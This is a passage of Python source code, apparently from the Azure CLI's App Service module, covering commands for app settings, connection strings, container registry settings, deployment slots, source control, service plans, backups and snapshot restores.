for arg in args[3:]:
if arg in int_flags and values[arg] is not None:
values[arg] = validate_and_convert_to_int(arg, values[arg])
if arg != 'generic_configurations' and values.get(arg, None):
setattr(configs, arg, values[arg] if arg not in bool_flags else values[arg] == 'true')
generic_configurations = generic_configurations or []
# https://github.com/Azure/azure-cli/issues/14857
updating_ip_security_restrictions = False
result = {}
for s in generic_configurations:
try:
json_object = get_json_object(s)
for config_name in json_object:
if config_name.lower() == 'ip_security_restrictions':
updating_ip_security_restrictions = True
result.update(json_object)
except CLIError:
config_name, value = s.split('=', 1)
result[config_name] = value
for config_name, value in result.items():
if config_name.lower() == 'ip_security_restrictions':
updating_ip_security_restrictions = True
setattr(configs, config_name, value)
if not updating_ip_security_restrictions:
setattr(configs, 'ip_security_restrictions', None)
setattr(configs, 'scm_ip_security_restrictions', None)
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_configuration', slot, configs)
def delete_app_settings(cmd, resource_group_name, name, setting_names, slot=None):
app_settings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_application_settings', slot)
client = web_client_factory(cmd.cli_ctx)
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
is_slot_settings = False
for setting_name in setting_names:
app_settings.properties.pop(setting_name, None)
if slot_cfg_names.app_setting_names and setting_name in slot_cfg_names.app_setting_names:
slot_cfg_names.app_setting_names.remove(setting_name)
is_slot_settings = True
if is_slot_settings:
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_application_settings',
app_settings, slot, client)
return _build_app_settings_output(result.properties, slot_cfg_names.app_setting_names)
def delete_azure_storage_accounts(cmd, resource_group_name, name, custom_id, slot=None):
azure_storage_accounts = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_azure_storage_accounts', slot)
client = web_client_factory(cmd.cli_ctx)
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
is_slot_settings = False
azure_storage_accounts.properties.pop(custom_id, None)
if slot_cfg_names.azure_storage_config_names and custom_id in slot_cfg_names.azure_storage_config_names:
slot_cfg_names.azure_storage_config_names.remove(custom_id)
is_slot_settings = True
if is_slot_settings:
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_azure_storage_accounts', azure_storage_accounts,
slot, client)
return result.properties
def _ssl_context():
if sys.version_info < (3, 4) or (in_cloud_console() and sys.platform.system() == 'Windows'):
try:
return ssl.SSLContext(ssl.PROTOCOL_TLS) # added in python 2.7.13 and 3.6
except AttributeError:
return ssl.SSLContext(ssl.PROTOCOL_TLSv1)
return ssl.create_default_context()
def _build_app_settings_output(app_settings, slot_cfg_names):
slot_cfg_names = slot_cfg_names or []
return [{'name': p,
'value': app_settings[p],
'slotSetting': p in slot_cfg_names} for p in _mask_creds_related_appsettings(app_settings)]
def update_connection_strings(cmd, resource_group_name, name, connection_string_type,
settings=None, slot=None, slot_settings=None):
from azure.mgmt.web.models import ConnStringValueTypePair
if not settings and not slot_settings:
raise CLIError('Usage Error: --settings |--slot-settings')
settings = settings or []
slot_settings = slot_settings or []
conn_strings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_connection_strings', slot)
for name_value in settings + slot_settings:
# split at the first '=', connection string should not have '=' in the name
conn_string_name, value = name_value.split('=', 1)
if value[0] in ["'", '"']: # strip away the quots used as separators
value = value[1:-1]
conn_strings.properties[conn_string_name] = ConnStringValueTypePair(value=value,
type=connection_string_type)
client = web_client_factory(cmd.cli_ctx)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_connection_strings',
conn_strings, slot, client)
if slot_settings:
new_slot_setting_names = [n.split('=', 1)[0] for n in slot_settings]
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
slot_cfg_names.connection_string_names = slot_cfg_names.connection_string_names or []
slot_cfg_names.connection_string_names += new_slot_setting_names
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
return result.properties
def delete_connection_strings(cmd, resource_group_name, name, setting_names, slot=None):
conn_strings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_connection_strings', slot)
client = web_client_factory(cmd.cli_ctx)
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
is_slot_settings = False
for setting_name in setting_names:
conn_strings.properties.pop(setting_name, None)
if slot_cfg_names.connection_string_names and setting_name in slot_cfg_names.connection_string_names:
slot_cfg_names.connection_string_names.remove(setting_name)
is_slot_settings = True
if is_slot_settings:
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
return _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_connection_strings',
conn_strings, slot, client)
CONTAINER_APPSETTING_NAMES = ['DOCKER_REGISTRY_SERVER_URL', 'DOCKER_REGISTRY_SERVER_USERNAME',
'DOCKER_REGISTRY_SERVER_PASSWORD', "WEBSITES_ENABLE_APP_SERVICE_STORAGE"]
APPSETTINGS_TO_MASK = ['DOCKER_REGISTRY_SERVER_PASSWORD']
def update_container_settings(cmd, resource_group_name, name, docker_registry_server_url=None,
docker_custom_image_name=None, docker_registry_server_user=None,
websites_enable_app_service_storage=None, docker_registry_server_password=None,
multicontainer_config_type=None, multicontainer_config_file=None, slot=None):
settings = []
if docker_registry_server_url is not None:
settings.append('DOCKER_REGISTRY_SERVER_URL=' + docker_registry_server_url)
if (not docker_registry_server_user and not docker_registry_server_password and
docker_registry_server_url and '.azurecr.io' in docker_registry_server_url):
logger.warning('No credential was provided to access Azure Container Registry. Trying to look up...')
parsed = urlparse(docker_registry_server_url)
registry_name = (parsed.netloc if parsed.scheme else parsed.path).split('.')[0]
try:
docker_registry_server_user, docker_registry_server_password = _get_acr_cred(cmd.cli_ctx, registry_name)
except Exception as ex: # pylint: disable=broad-except
logger.warning("Retrieving credentials failed with an exception:'%s'", ex) # consider throw if needed
if docker_registry_server_user is not None:
settings.append('DOCKER_REGISTRY_SERVER_USERNAME=' + docker_registry_server_user)
if docker_registry_server_password is not None:
settings.append('DOCKER_REGISTRY_SERVER_PASSWORD=' + docker_registry_server_password)
if websites_enable_app_service_storage:
settings.append('WEBSITES_ENABLE_APP_SERVICE_STORAGE=' + websites_enable_app_service_storage)
if docker_registry_server_user or docker_registry_server_password or docker_registry_server_url or websites_enable_app_service_storage: # pylint: disable=line-too-long
update_app_settings(cmd, resource_group_name, name, settings, slot)
settings = get_app_settings(cmd, resource_group_name, name, slot)
if docker_custom_image_name is not None:
_add_fx_version(cmd, resource_group_name, name, docker_custom_image_name, slot)
if multicontainer_config_file and multicontainer_config_type:
encoded_config_file = _get_linux_multicontainer_encoded_config_from_file(multicontainer_config_file)
linux_fx_version = _format_fx_version(encoded_config_file, multicontainer_config_type)
update_site_configs(cmd, resource_group_name, name, linux_fx_version=linux_fx_version, slot=slot)
elif multicontainer_config_file or multicontainer_config_type:
logger.warning('Must change both settings --multicontainer-config-file FILE --multicontainer-config-type TYPE')
return _mask_creds_related_appsettings(_filter_for_container_settings(cmd, resource_group_name, name, settings,
slot=slot))
def update_container_settings_functionapp(cmd, resource_group_name, name, docker_registry_server_url=None,
docker_custom_image_name=None, docker_registry_server_user=None,
docker_registry_server_password=None, slot=None):
return update_container_settings(cmd, resource_group_name, name, docker_registry_server_url,
docker_custom_image_name, docker_registry_server_user, None,
docker_registry_server_password, multicontainer_config_type=None,
multicontainer_config_file=None, slot=slot)
def _get_acr_cred(cli_ctx, registry_name):
from azure.mgmt.containerregistry import ContainerRegistryManagementClient
from azure.cli.core.commands.parameters import get_resources_in_subscription
client = get_mgmt_service_client(cli_ctx, ContainerRegistryManagementClient).registries
result = get_resources_in_subscription(cli_ctx, 'Microsoft.ContainerRegistry/registries')
result = [item for item in result if item.name.lower() == registry_name]
if not result or len(result) > 1:
raise CLIError("No resource or more than one were found with name '{}'.".format(registry_name))
resource_group_name = parse_resource_id(result[0].id)['resource_group']
registry = client.get(resource_group_name, registry_name)
if registry.admin_user_enabled: # pylint: disable=no-member
cred = client.list_credentials(resource_group_name, registry_name)
return cred.username, cred.passwords[0].value
raise CLIError("Failed to retrieve container registry credentials. Please either provide the "
"credentials or run 'az acr update -n {} --admin-enabled true' to enable "
"admin first.".format(registry_name))
def delete_container_settings(cmd, resource_group_name, name, slot=None):
_delete_linux_fx_version(cmd, resource_group_name, name, slot)
delete_app_settings(cmd, resource_group_name, name, CONTAINER_APPSETTING_NAMES, slot)
def show_container_settings(cmd, resource_group_name, name, show_multicontainer_config=None, slot=None):
settings = get_app_settings(cmd, resource_group_name, name, slot)
return _mask_creds_related_appsettings(_filter_for_container_settings(cmd, resource_group_name, name, settings,
show_multicontainer_config, slot))
def show_container_settings_functionapp(cmd, resource_group_name, name, slot=None):
return show_container_settings(cmd, resource_group_name, name, show_multicontainer_config=None, slot=slot)
def _filter_for_container_settings(cmd, resource_group_name, name, settings,
show_multicontainer_config=None, slot=None):
result = [x for x in settings if x['name'] in CONTAINER_APPSETTING_NAMES]
fx_version = _get_fx_version(cmd, resource_group_name, name, slot).strip()
if fx_version:
added_image_name = {'name': 'DOCKER_CUSTOM_IMAGE_NAME',
'value': fx_version}
result.append(added_image_name)
if show_multicontainer_config:
decoded_value = _get_linux_multicontainer_decoded_config(cmd, resource_group_name, name, slot)
decoded_image_name = {'name': 'DOCKER_CUSTOM_IMAGE_NAME_DECODED',
'value': decoded_value}
result.append(decoded_image_name)
return result
# TODO: remove this when #3660(service tracking issue) is resolved
def _mask_creds_related_appsettings(settings):
for x in [x1 for x1 in settings if x1 in APPSETTINGS_TO_MASK]:
settings[x] = None
return settings
def add_hostname(cmd, resource_group_name, webapp_name, hostname, slot=None):
from azure.mgmt.web.models import HostNameBinding
client = web_client_factory(cmd.cli_ctx)
webapp = client.web_apps.get(resource_group_name, webapp_name)
if not webapp:
raise CLIError("'{}' app doesn't exist".format(webapp_name))
binding = HostNameBinding(site_name=webapp.name)
if slot is None:
return client.web_apps.create_or_update_host_name_binding(resource_group_name=resource_group_name,
name=webapp.name, host_name=hostname,
host_name_binding=binding)
return client.web_apps.create_or_update_host_name_binding_slot(resource_group_name=resource_group_name,
name=webapp.name, host_name=hostname,
slot=slot, host_name_binding=binding)
def delete_hostname(cmd, resource_group_name, webapp_name, hostname, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot is None:
return client.web_apps.delete_host_name_binding(resource_group_name, webapp_name, hostname)
return client.web_apps.delete_host_name_binding_slot(resource_group_name, webapp_name, slot, hostname)
def list_hostnames(cmd, resource_group_name, webapp_name, slot=None):
result = list(_generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name,
'list_host_name_bindings', slot))
for r in result:
r.name = r.name.split('/')[-1]
return result
def get_external_ip(cmd, resource_group_name, webapp_name):
SslState = cmd.get_models('SslState')
# logics here are ported from portal
client = web_client_factory(cmd.cli_ctx)
webapp = client.web_apps.get(resource_group_name, webapp_name)
if not webapp:
raise CLIError("'{}' app doesn't exist".format(webapp_name))
if webapp.hosting_environment_profile:
address = client.app_service_environments.list_vips(
resource_group_name, webapp.hosting_environment_profile.name)
if address.internal_ip_address:
ip_address = address.internal_ip_address
else:
vip = next((s for s in webapp.host_name_ssl_states if s.ssl_state == SslState.ip_based_enabled), None)
ip_address = vip.virtual_ip if vip else address.service_ip_address
else:
ip_address = _resolve_hostname_through_dns(webapp.default_host_name)
return {'ip': ip_address}
def _resolve_hostname_through_dns(hostname):
import socket
return socket.gethostbyname(hostname)
def create_webapp_slot(cmd, resource_group_name, webapp, slot, configuration_source=None):
Site, SiteConfig, NameValuePair = cmd.get_models('Site', 'SiteConfig', 'NameValuePair')
client = web_client_factory(cmd.cli_ctx)
site = client.web_apps.get(resource_group_name, webapp)
site_config = get_site_configs(cmd, resource_group_name, webapp, None)
if not site:
raise CLIError("'{}' app doesn't exist".format(webapp))
if 'functionapp' in site.kind:
raise CLIError("'{}' is a function app. Please use `az functionapp deployment slot create`.".format(webapp))
location = site.location
slot_def = Site(server_farm_id=site.server_farm_id, location=location)
slot_def.site_config = SiteConfig()
# if it is a Windows Container site, at least pass the necessary
# app settings to perform the container image validation:
if configuration_source and site_config.windows_fx_version:
# get settings from the source
clone_from_prod = configuration_source.lower() == webapp.lower()
src_slot = None if clone_from_prod else configuration_source
app_settings = _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp,
'list_application_settings', src_slot)
settings = []
for k, v in app_settings.properties.items():
if k in ("DOCKER_REGISTRY_SERVER_USERNAME", "DOCKER_REGISTRY_SERVER_PASSWORD",
"DOCKER_REGISTRY_SERVER_URL"):
settings.append(NameValuePair(name=k, value=v))
slot_def.site_config = SiteConfig(app_settings=settings)
poller = client.web_apps.begin_create_or_update_slot(resource_group_name, webapp, site_envelope=slot_def, slot=slot)
result = LongRunningOperation(cmd.cli_ctx)(poller)
if configuration_source:
update_slot_configuration_from_source(cmd, client, resource_group_name, webapp, slot, configuration_source)
result.name = result.name.split('/')[-1]
return result
def create_functionapp_slot(cmd, resource_group_name, name, slot, configuration_source=None):
Site = cmd.get_models('Site')
client = web_client_factory(cmd.cli_ctx)
site = client.web_apps.get(resource_group_name, name)
if not site:
raise CLIError("'{}' function app doesn't exist".format(name))
location = site.location
slot_def = Site(server_farm_id=site.server_farm_id, location=location)
poller = client.web_apps.begin_create_or_update_slot(resource_group_name, name, site_envelope=slot_def, slot=slot)
result = LongRunningOperation(cmd.cli_ctx)(poller)
if configuration_source:
update_slot_configuration_from_source(cmd, client, resource_group_name, name, slot, configuration_source)
result.name = result.name.split('/')[-1]
return result
def update_slot_configuration_from_source(cmd, client, resource_group_name, webapp, slot, configuration_source=None):
clone_from_prod = configuration_source.lower() == webapp.lower()
site_config = get_site_configs(cmd, resource_group_name, webapp,
None if clone_from_prod else configuration_source)
_generic_site_operation(cmd.cli_ctx, resource_group_name, webapp,
'update_configuration', slot, site_config)
# slot create doesn't clone over the app-settings and connection-strings, so we do it here
# also make sure slot settings don't get propagated.
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, webapp)
src_slot = None if clone_from_prod else configuration_source
app_settings = _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp,
'list_application_settings',
src_slot)
for a in slot_cfg_names.app_setting_names or []:
app_settings.properties.pop(a, None)
connection_strings = _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp,
'list_connection_strings',
src_slot)
for a in slot_cfg_names.connection_string_names or []:
connection_strings.properties.pop(a, None)
_generic_settings_operation(cmd.cli_ctx, resource_group_name, webapp,
'update_application_settings',
app_settings, slot, client)
_generic_settings_operation(cmd.cli_ctx, resource_group_name, webapp,
'update_connection_strings',
connection_strings, slot, client)
def config_source_control(cmd, resource_group_name, name, repo_url, repository_type='git', branch=None, # pylint: disable=too-many-locals
manual_integration=None, git_token=None, slot=None, github_action=None):
client = web_client_factory(cmd.cli_ctx)
location = _get_location_from_webapp(client, resource_group_name, name)
from azure.mgmt.web.models import SiteSourceControl, SourceControl
if git_token:
sc = SourceControl(location=location, source_control_name='GitHub', token=git_token)
client.update_source_control('GitHub', sc)
source_control = SiteSourceControl(location=location, repo_url=repo_url, branch=branch,
is_manual_integration=manual_integration,
is_mercurial=(repository_type != 'git'), is_git_hub_action=bool(github_action))
# SCC config can fail if previous commands caused SCMSite shutdown, so retry here.
for i in range(5):
try:
poller = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'begin_create_or_update_source_control',
slot, source_control)
return LongRunningOperation(cmd.cli_ctx)(poller)
except Exception as ex: # pylint: disable=broad-except
import re
ex = ex_handler_factory(no_throw=True)(ex)
# for non server errors(50x), just throw; otherwise retry 4 times
if i == 4 or not re.findall(r'\(50\d\)', str(ex)):
raise
logger.warning('retrying %s/4', i + 1)
time.sleep(5) # retry in a moment
def update_git_token(cmd, git_token=None):
'''
Update source control token cached in Azure app service. If no token is provided,
the command will clean up existing token.
'''
client = web_client_factory(cmd.cli_ctx)
from azure.mgmt.web.models import SourceControl
sc = SourceControl(name='not-really-needed', source_control_name='GitHub', token=git_token or '')
return client.update_source_control('GitHub', sc)
def show_source_control(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get_source_control', slot)
def delete_source_control(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'delete_source_control', slot)
def enable_local_git(cmd, resource_group_name, name, slot=None):
client = web_client_factory(cmd.cli_ctx)
site_config = get_site_configs(cmd, resource_group_name, name, slot)
site_config.scm_type = 'LocalGit'
_generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'create_or_update_configuration', slot, site_config)
return {'url': _get_local_git_url(cmd.cli_ctx, client, resource_group_name, name, slot)}
def sync_site_repo(cmd, resource_group_name, name, slot=None):
try:
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'sync_repository', slot)
except CloudError as ex: # Because of bad spec, sdk throws on 200. We capture it here
if ex.status_code not in [200, 204]:
raise ex
def list_app_service_plans(cmd, resource_group_name=None):
client = web_client_factory(cmd.cli_ctx)
if resource_group_name is None:
plans = list(client.app_service_plans.list(detailed=True)) # enables querying "numberOfSites"
else:
plans = list(client.app_service_plans.list_by_resource_group(resource_group_name))
for plan in plans:
# prune a few useless fields
del plan.geo_region
del plan.subscription
return plans
# TODO use zone_redundant field on ASP model when we switch to SDK version 5.0.0
def _enable_zone_redundant(plan_def, sku_def, number_of_workers):
plan_def.enable_additional_properties_sending()
existing_properties = plan_def.serialize()["properties"]
plan_def.additional_properties["properties"] = existing_properties
plan_def.additional_properties["properties"]["zoneRedundant"] = True
if number_of_workers is None:
sku_def.capacity = 3
else:
sku_def.capacity = max(3, number_of_workers)
def create_app_service_plan(cmd, resource_group_name, name, is_linux, hyper_v, per_site_scaling=False,
app_service_environment=None, sku='B1', number_of_workers=None, location=None,
tags=None, no_wait=False, zone_redundant=False):
HostingEnvironmentProfile, SkuDescription, AppServicePlan = cmd.get_models(
'HostingEnvironmentProfile', 'SkuDescription', 'AppServicePlan')
client = web_client_factory(cmd.cli_ctx)
if app_service_environment:
if hyper_v:
raise ArgumentUsageError('Windows containers is not yet supported in app service environment')
ase_list = client.app_service_environments.list()
ase_found = False
ase = None
for ase in ase_list:
if ase.name.lower() == app_service_environment.lower() or ase.id.lower() == app_service_environment.lower():
ase_def = HostingEnvironmentProfile(id=ase.id)
location = ase.location
ase_found = True
break
if not ase_found:
err_msg = "App service environment '{}' not found in subscription.".format(app_service_environment)
raise ResourceNotFoundError(err_msg)
else: # Non-ASE
ase_def = None
if location is None:
location = _get_location_from_resource_group(cmd.cli_ctx, resource_group_name)
# the api is odd on parameter naming, have to live with it for now
sku_def = SkuDescription(tier=get_sku_tier(sku), name=_normalize_sku(sku), capacity=number_of_workers)
plan_def = AppServicePlan(location=location, tags=tags, sku=sku_def,
reserved=(is_linux or None), hyper_v=(hyper_v or None), name=name,
per_site_scaling=per_site_scaling, hosting_environment_profile=ase_def)
if sku.upper() in ['WS1', 'WS2', 'WS3']:
existing_plan = get_resource_if_exists(client.app_service_plans,
resource_group_name=resource_group_name, name=name)
if existing_plan and existing_plan.sku.tier != "WorkflowStandard":
raise ValidationError("Plan {} in resource group {} already exists and "
"cannot be updated to a logic app SKU (WS1, WS2, or WS3)")
plan_def.type = "elastic"
if zone_redundant:
_enable_zone_redundant(plan_def, sku_def, number_of_workers)
return sdk_no_wait(no_wait, client.app_service_plans.begin_create_or_update, name=name,
resource_group_name=resource_group_name, app_service_plan=plan_def)
def update_app_service_plan(instance, sku=None, number_of_workers=None, elastic_scale=None,
max_elastic_worker_count=None):
if number_of_workers is None and sku is None and elastic_scale is None and max_elastic_worker_count is None:
args = ["--number-of-workers", "--sku", "--elastic-scale", "--max-elastic-worker-count"]
logger.warning('Nothing to update. Set one of the following parameters to make an update: %s', str(args))
sku_def = instance.sku
if sku is not None:
sku = _normalize_sku(sku)
sku_def.tier = get_sku_tier(sku)
sku_def.name = sku
if number_of_workers is not None:
sku_def.capacity = number_of_workers
else:
number_of_workers = sku_def.capacity
if elastic_scale is not None or max_elastic_worker_count is not None:
if sku is None:
sku = instance.sku.name
if get_sku_tier(sku) not in ["PREMIUMV2", "PREMIUMV3"]:
raise ValidationError("--number-of-workers and --elastic-scale can only be used on premium V2/V3 SKUs. "
"Use command help to see all available SKUs")
if elastic_scale is not None:
# TODO use instance.elastic_scale_enabled once the ASP client factories are updated
use_additional_properties(instance)
instance.additional_properties["properties"]["elasticScaleEnabled"] = elastic_scale
if max_elastic_worker_count is not None:
instance.maximum_elastic_worker_count = max_elastic_worker_count
if max_elastic_worker_count < number_of_workers:
raise InvalidArgumentValueError("--max-elastic-worker-count must be greater than or equal to the "
"plan's number of workers. To update the plan's number of workers, use "
"--number-of-workers ")
# TODO use instance.maximum_elastic_worker_count once the ASP client factories are updated
use_additional_properties(instance)
instance.additional_properties["properties"]["maximumElasticWorkerCount"] = max_elastic_worker_count
instance.sku = sku_def
return instance
def show_plan(cmd, resource_group_name, name):
from azure.cli.core.commands.client_factory import get_subscription_id
client = web_client_factory(cmd.cli_ctx)
serverfarm_url_base = 'subscriptions/{}/resourceGroups/{}/providers/Microsoft.Web/serverfarms/{}?api-version={}'
subscription_id = get_subscription_id(cmd.cli_ctx)
serverfarm_url = serverfarm_url_base.format(subscription_id, resource_group_name, name, client.DEFAULT_API_VERSION)
request_url = cmd.cli_ctx.cloud.endpoints.resource_manager + serverfarm_url
response = send_raw_request(cmd.cli_ctx, "GET", request_url)
return response.json()
def update_functionapp_app_service_plan(cmd, instance, sku=None, number_of_workers=None, max_burst=None):
instance = update_app_service_plan(instance, sku, number_of_workers)
if max_burst is not None:
if not is_plan_elastic_premium(cmd, instance):
raise CLIError("Usage error: --max-burst is only supported for Elastic Premium (EP) plans")
max_burst = validate_range_of_int_flag('--max-burst', max_burst, min_val=0, max_val=20)
instance.maximum_elastic_worker_count = max_burst
if number_of_workers is not None:
number_of_workers = validate_range_of_int_flag('--number-of-workers / --min-instances',
number_of_workers, min_val=0, max_val=20)
return update_app_service_plan(instance, sku, number_of_workers)
def show_backup_configuration(cmd, resource_group_name, webapp_name, slot=None):
try:
return _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name,
'get_backup_configuration', slot)
except Exception: # pylint: disable=broad-except
raise CLIError('Backup configuration not found')
def list_backups(cmd, resource_group_name, webapp_name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name, 'list_backups', slot)
def create_backup(cmd, resource_group_name, webapp_name, storage_account_url,
db_name=None, db_type=None,
db_connection_string=None, backup_name=None, slot=None):
BackupRequest = cmd.get_models('BackupRequest')
client = web_client_factory(cmd.cli_ctx)
if backup_name and backup_name.lower().endswith('.zip'):
backup_name = backup_name[:-4]
db_setting = _create_db_setting(cmd, db_name, db_type=db_type, db_connection_string=db_connection_string)
backup_request = BackupRequest(backup_name=backup_name,
storage_account_url=storage_account_url, databases=db_setting)
if slot:
return client.web_apps.backup_slot(resource_group_name, webapp_name, backup_request, slot)
return client.web_apps.backup(resource_group_name, webapp_name, backup_request)
def update_backup_schedule(cmd, resource_group_name, webapp_name, storage_account_url=None,
frequency=None, keep_at_least_one_backup=None,
retention_period_in_days=None, db_name=None,
db_connection_string=None, db_type=None, backup_name=None, slot=None):
BackupSchedule, BackupRequest = cmd.get_models('BackupSchedule', 'BackupRequest')
configuration = None
if backup_name and backup_name.lower().endswith('.zip'):
backup_name = backup_name[:-4]
if not backup_name:
backup_name = '{0}_{1}'.format(webapp_name, datetime.datetime.utcnow().strftime('%Y%m%d%H%M'))
try:
configuration = _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name,
'get_backup_configuration', slot)
except Exception: # pylint: disable=broad-except
# No configuration set yet
if not all([storage_account_url, frequency, retention_period_in_days,
keep_at_least_one_backup]):
raise CLIError('No backup configuration found. A configuration must be created. ' +
'Usage: --container-url URL --frequency TIME --retention DAYS ' +
'--retain-one TRUE/FALSE')
# If arguments were not specified, use the values in the current backup schedule
if storage_account_url is None:
storage_account_url = configuration.storage_account_url
if retention_period_in_days is None:
retention_period_in_days = configuration.backup_schedule.retention_period_in_days
if keep_at_least_one_backup is None:
keep_at_least_one_backup = configuration.backup_schedule.keep_at_least_one_backup
else:
keep_at_least_one_backup = keep_at_least_one_backup.lower() == 'true'
if frequency:
# Parse schedule frequency
frequency_num, frequency_unit = _parse_frequency(cmd, frequency)
else:
frequency_num = configuration.backup_schedule.frequency_interval
frequency_unit = configuration.backup_schedule.frequency_unit
if configuration and configuration.databases:
db = configuration.databases[0]
db_type = db_type or db.database_type
db_name = db_name or db.name
db_connection_string = db_connection_string or db.connection_string
db_setting = _create_db_setting(cmd, db_name, db_type=db_type, db_connection_string=db_connection_string)
backup_schedule = BackupSchedule(frequency_interval=frequency_num, frequency_unit=frequency_unit.name,
keep_at_least_one_backup=keep_at_least_one_backup,
retention_period_in_days=retention_period_in_days)
backup_request = BackupRequest(backup_request_name=backup_name, backup_schedule=backup_schedule,
enabled=True, storage_account_url=storage_account_url,
databases=db_setting)
return _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name, 'update_backup_configuration',
slot, backup_request)
def restore_backup(cmd, resource_group_name, webapp_name, storage_account_url, backup_name,
db_name=None, db_type=None, db_connection_string=None,
target_name=None, overwrite=None, ignore_hostname_conflict=None, slot=None):
RestoreRequest = cmd.get_models('RestoreRequest')
client = web_client_factory(cmd.cli_ctx)
storage_blob_name = backup_name
if not storage_blob_name.lower().endswith('.zip'):
storage_blob_name += '.zip'
db_setting = _create_db_setting(cmd, db_name, db_type=db_type, db_connection_string=db_connection_string)
restore_request = RestoreRequest(storage_account_url=storage_account_url,
blob_name=storage_blob_name, overwrite=overwrite,
site_name=target_name, databases=db_setting,
ignore_conflicting_host_names=ignore_hostname_conflict)
if slot:
return client.web_apps.restore_slot(resource_group_name, webapp_name, 0, restore_request, slot)
return client.web_apps.restore(resource_group_name, webapp_name, 0, restore_request)
def list_snapshots(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_snapshots',
slot)
def restore_snapshot(cmd, resource_group_name, name, time, slot=None, restore_content_only=False, # pylint: disable=redefined-outer-name
source_resource_group=None, source_name=None, source_slot=None):
from azure.cli.core.commands.client_factory import get_subscription_id
SnapshotRecoverySource, SnapshotRestoreRequest = cmd.get_models('SnapshotRecoverySource', 'SnapshotRestoreRequest')
client = web_client_factory(cmd.cli_ctx)
recover_config = not restore_content_only
if all([source_resource_group, source_name]):
# Restore from source app to target app
sub_id = get_subscription_id(cmd.cli_ctx)
source_id = "/subscriptions/" + sub_id + "/resourceGroups/" + source_resource_group + \
"/providers/Microsoft.Web/sites/" + source_name
if source_slot:
source_id = source_id + "/slots/" + source_slot
source = SnapshotRecoverySource(id=source_id)
request = SnapshotRestoreRequest(overwrite=False, snapshot_time=time, recovery_source=source,
recover_configuration=recover_config)
if slot:
return client.web_apps.restore_snapshot_slot(resource_group_name, name, request, slot)
return client.web_apps.restore_snapshot(resource_group_name, name, request)
if any([source_resource_group, source_name]):
raise CLIError('usage error: --source-resource-group and --source-name must both be specified if one is used')
# Overwrite app with its own snapshot
request = SnapshotRestoreRequest(overwrite=True, snapshot_time=time, recover_configuration=recover_config)
if slot:
return client.web_apps.restore_snapshot_slot(resource_group_name, name, request, slot)
return client.web_apps.restore_snapshot(resource_group_name, name, request)
# pylint: disable=inconsistent-return-statements
def _create_db_setting(cmd, db_name, db_type, db_connection_string):
DatabaseBackupSetting = cmd.get_models('DatabaseBackupSetting')
if all([db_name, db_type, db_connection_string]):
return [DatabaseBackupSetting(database_type=db_type, name=db_name, connection_string=db_connection_string)]
if any([db_name, db_type, db_connection_string]):
raise CLIError('usage error: --db-name NAME --db-type TYPE --db-connection-string STRING')
def _parse_frequency(cmd, frequency):
FrequencyUnit = cmd.get_models('FrequencyUnit')
unit_part = frequency.lower()[-1]
if unit_part == 'd':
frequency_unit = FrequencyUnit.day
elif unit_part == 'h':
frequency_unit = FrequencyUnit.hour
else:
raise CLIError('Frequency must end with d or h for "day" or "hour"')
try:
frequency_num = int(frequency[:-1])
except ValueError:
raise CLIError('Frequency must start with a number')
if frequency_num < 0:
raise CLIError('Frequency must be positive')
return frequency_num, frequency_unit
def _get_deleted_apps_locations(cli_ctx):
client = get_mgmt_service_client(cli_ctx, ResourceType.MGMT_RESOURCE_RESOURCES)
web_provider = client.providers.get('Microsoft.Web')
del_sites_resource = next((x for x in web_provider.resource_types if x.resource_type == 'deletedSites'), None)
if del_sites_resource:
return del_sites_resource.locations
return []
def _get_local_git_url(cli_ctx, client, resource_group_name, name, slot=None):
user = client.get_publishing_user()
result = _generic_site_operation(cli_ctx, resource_group_name, name, 'get_source_control', slot)
parsed = urlparse(result.repo_url)
return '{}://{}@{}/{}.git'.format(parsed.scheme, user.publishing_user_name,
parsed.netloc, name)
def _get_scm_url(cmd, resource_group_name, name, slot=None):
from azure.mgmt.web.models import HostType
app = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
for host in app.host_name_ssl_states or []:
if host.host_type == HostType.repository:
return "https://{}".format(host.name)
# this should not happen, but throw anyway
raise ValueError('Failed to retrieve Scm Uri')
def get_publishing_user(cmd):
client = web_client_factory(cmd.cli_ctx)
return client.get_publishing_user()
def set_deployment_user(cmd, user_name, password=None):
'''
Update deployment credentials.(Note, all webapps in your subscription will be impacted)
'''
User = cmd.get_models('User')
client = web_client_factory(cmd.cli_ctx)
user = User(publishing_user_name=user_name)
if password is None:
try:
password = prompt_pass(msg='Password: ', confirm=True)
except NoTTYException:
